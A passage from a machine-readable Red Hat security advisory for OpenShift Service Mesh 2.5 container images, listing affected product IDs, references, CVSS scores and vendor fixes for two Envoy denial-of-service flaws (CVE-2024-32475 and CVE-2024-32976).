"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32475", }, { category: "external", summary: "RHBZ#2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32475", url: "https://www.cve.org/CVERecord?id=CVE-2024-32475", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32475", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", url: "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj", }, ], release_date: "2024-04-18T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters", }, { cve: "CVE-2024-32976", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-05-24T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2283145", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy's Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Brotli decompressor infinite loop", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32976", }, { category: "external", summary: "RHBZ#2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32976", url: "https://www.cve.org/CVERecord?id=CVE-2024-32976", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", 